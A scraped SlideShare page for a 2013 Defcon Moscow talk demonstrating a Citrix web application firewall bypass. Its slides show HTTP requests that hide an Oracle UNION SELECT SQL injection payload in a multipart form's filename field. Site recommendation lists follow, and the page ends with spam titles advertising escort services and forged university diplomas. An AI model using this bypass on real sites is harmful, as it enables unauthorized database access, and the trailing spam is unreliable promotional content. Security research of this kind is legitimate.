SlideShare a Scribd company logo

Citrix WAF bypass techniques exposed in daily hack report

defconmoscow
defconmoscow

Meeting #2.

Internet
1 of 7
Download to read offline
Daily hack By DCM Jun 30, 2013
/whoami Defcon Moscow  You already know it about us  ???  PROFIT
Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr
Daily hack The end.

Recommended

Change log
Change logChange log
Change logWagner Alves
 
A brief history of Linux Containers
A brief history of Linux Containers A brief history of Linux Containers
A brief history of Linux Containers Kirill Kolyshkin
 
Brief history of Linux containers
Brief history of Linux containersBrief history of Linux containers
Brief history of Linux containersOpenVZ
 
Test
TestTest
Testdangthikimoanh
 
Installation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdInstallation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdgourav kottawar
 
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanUnicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanCysinfo Cyber Security Community
 
Containers from scratch
Containers from scratchContainers from scratch
Containers from scratchRakuten Group, Inc.
 
using Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderusing Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderYingshiuan Pan
 

Recommended

Change log
Change logChange log
Change logWagner Alves
 
A brief history of Linux Containers
A brief history of Linux Containers A brief history of Linux Containers
A brief history of Linux Containers Kirill Kolyshkin
 
Brief history of Linux containers
Brief history of Linux containersBrief history of Linux containers
Brief history of Linux containersOpenVZ
 
Test
TestTest
Testdangthikimoanh
 
Installation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdInstallation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdgourav kottawar
 
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanUnicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanCysinfo Cyber Security Community
 
Containers from scratch
Containers from scratchContainers from scratch
Containers from scratchRakuten Group, Inc.
 
using Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderusing Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderYingshiuan Pan
 
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkDRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkmeazza_15
 
Building a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellBuilding a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellEC-Council
 
Windows 7 installation ppt
Windows 7 installation pptWindows 7 installation ppt
Windows 7 installation pptNagarajan Kamalakannan
 
How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.José Ignacio Carretero Guarde
 
Windows XP Professional Installation
Windows XP Professional InstallationWindows XP Professional Installation
Windows XP Professional InstallationNagarajan Kamalakannan
 
Require js + backbone, bower and grunt
Require js + backbone, bower and gruntRequire js + backbone, bower and grunt
Require js + backbone, bower and gruntJoe Fleming
 
containers-intro
containers-introcontainers-intro
containers-introJosef Karásek
 
Deposito
DepositoDeposito
Depositoasroli AkanberubahinsyaAllah
 
Exploits
ExploitsExploits
ExploitsTylor Shellenberger
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriDesign Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriManageIQ
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsEuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsVinícius Zavam
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hostingpunkt.de GmbH
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 
Hacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionHacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionLevente Kurusa
 
Redis fundamental
Redis fundamentalRedis fundamental
Redis fundamentalYuhao Zhang
 
CodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCheyin L
 
Linux Tor Browser kurulum
Linux Tor Browser kurulumLinux Tor Browser kurulum
Linux Tor Browser kurulumreso95
 
Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Yuki Mizuno
 
Hacking Citrix Cloud Server
Hacking Citrix Cloud ServerHacking Citrix Cloud Server
Hacking Citrix Cloud ServerMr Cracker
 
Got citrix hack it
Got citrix hack itGot citrix hack it
Got citrix hack itSujith Rasnayake
 
In house penetration testing pci dss
In house penetration testing pci dssIn house penetration testing pci dss
In house penetration testing pci dssRichard Thompson
 
[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on AndroidDEVCORE
 

More Related Content

What's hot

DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkDRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkmeazza_15
 
Building a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellBuilding a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellEC-Council
 
Require js + backbone, bower and grunt
Require js + backbone, bower and gruntRequire js + backbone, bower and grunt
Require js + backbone, bower and gruntJoe Fleming
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriDesign Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriManageIQ
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsEuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsVinícius Zavam
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 
Hacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionHacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionLevente Kurusa
 
Redis fundamental
Redis fundamentalRedis fundamental
Redis fundamentalYuhao Zhang
 
CodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCheyin L
 
Linux Tor Browser kurulum
Linux Tor Browser kurulumLinux Tor Browser kurulum
Linux Tor Browser kurulumreso95
 
Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Yuki Mizuno
 

What's hot (18)

DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkDRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
 
Building a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellBuilding a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin Cardwell
 
Windows 7 installation ppt
Windows 7 installation pptWindows 7 installation ppt
Windows 7 installation ppt
 
How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.
 
Windows XP Professional Installation
Windows XP Professional InstallationWindows XP Professional Installation
Windows XP Professional Installation
 
Require js + backbone, bower and grunt
Require js + backbone, bower and gruntRequire js + backbone, bower and grunt
Require js + backbone, bower and grunt
 
containers-intro
containers-introcontainers-intro
containers-intro
 
Deposito
DepositoDeposito
Deposito
 
Exploits
ExploitsExploits
Exploits
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriDesign Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsEuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD Systems
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hosting
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means
 
Hacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionHacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An Introduction
 
Redis fundamental
Redis fundamentalRedis fundamental
Redis fundamental
 
CodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storage
 
Linux Tor Browser kurulum
Linux Tor Browser kurulumLinux Tor Browser kurulum
Linux Tor Browser kurulum
 
Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話
 

Viewers also liked

Hacking Citrix Cloud Server
Hacking Citrix Cloud ServerHacking Citrix Cloud Server
Hacking Citrix Cloud ServerMr Cracker
 
In house penetration testing pci dss
In house penetration testing pci dssIn house penetration testing pci dss
In house penetration testing pci dssRichard Thompson
 
[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on AndroidDEVCORE
 
Android pen test basics
Android pen test basicsAndroid pen test basics
Android pen test basicsOWASPKerala
 
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...Cheng-Yi Yu
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security WorkshopOWASP
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....Denis Gundarev
 
Penetration Testing for Android Smartphones
Penetration Testing for Android SmartphonesPenetration Testing for Android Smartphones
Penetration Testing for Android SmartphonesIOSR Journals
 

Viewers also liked (12)

Hacking Citrix Cloud Server
Hacking Citrix Cloud ServerHacking Citrix Cloud Server
Hacking Citrix Cloud Server
 
Got citrix hack it
Got citrix hack itGot citrix hack it
Got citrix hack it
 
In house penetration testing pci dss
In house penetration testing pci dssIn house penetration testing pci dss
In house penetration testing pci dss
 
[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android
 
Android pen test basics
Android pen test basicsAndroid pen test basics
Android pen test basics
 
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration Testing
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
 
Penetration Testing for Android Smartphones
Penetration Testing for Android SmartphonesPenetration Testing for Android Smartphones
Penetration Testing for Android Smartphones
 

Similar to Citrix WAF bypass techniques exposed in daily hack report

Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'Rawnet
 
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Codemotion
 
How our computers connect to facebook
How our computers connect to facebookHow our computers connect to facebook
How our computers connect to facebookYiKuo3
 
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveOWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveCheckmarx
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
Rootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project VirtualisationRootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project VirtualisationThe Linux Foundation
 
Http
HttpHttp
HttpNEATS
 
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)Ericom Software
 
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Grand Parade Poland
 
WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)Igalia
 
Web browsertico
Web browserticoWeb browsertico
Web browserticotico3195
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsAnton Chuvakin
 
Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09deathflu
 
MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)Kevin Lo
 
Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011shoesing
 
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...APNIC
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 

Similar to Citrix WAF bypass techniques exposed in daily hack report (20)

Web tech 101
Web tech 101Web tech 101
Web tech 101
 
Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'
 
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
 
How our computers connect to facebook
How our computers connect to facebookHow our computers connect to facebook
How our computers connect to facebook
 
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveOWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Rootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project VirtualisationRootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project Virtualisation
 
Http
HttpHttp
Http
 
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
 
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
 
WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)
 
Cgi
CgiCgi
Cgi
 
Web browsertico
Web browserticoWeb browsertico
Web browsertico
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, Incidents
 
Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09
 
MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)
 
Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011
 
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 

More from defconmoscow

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRLdefconmoscow
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]defconmoscow
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2defconmoscow
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hackingdefconmoscow
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenmentdefconmoscow
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF finaldefconmoscow
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jaildefconmoscow
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websitesdefconmoscow
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protectiondefconmoscow
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6defconmoscow
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communicationsdefconmoscow
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensicsdefconmoscow
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]defconmoscow
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecryptdefconmoscow
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]defconmoscow
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardwaredefconmoscow
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditionsdefconmoscow
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddlerdefconmoscow
 
4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitation4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitationdefconmoscow
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypotdefconmoscow
 

More from defconmoscow (20)

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRL
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenment
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF final
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communications
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensics
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddler
 
4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitation4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitation
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypot
 

Recently uploaded

Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Personfurqan222004
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
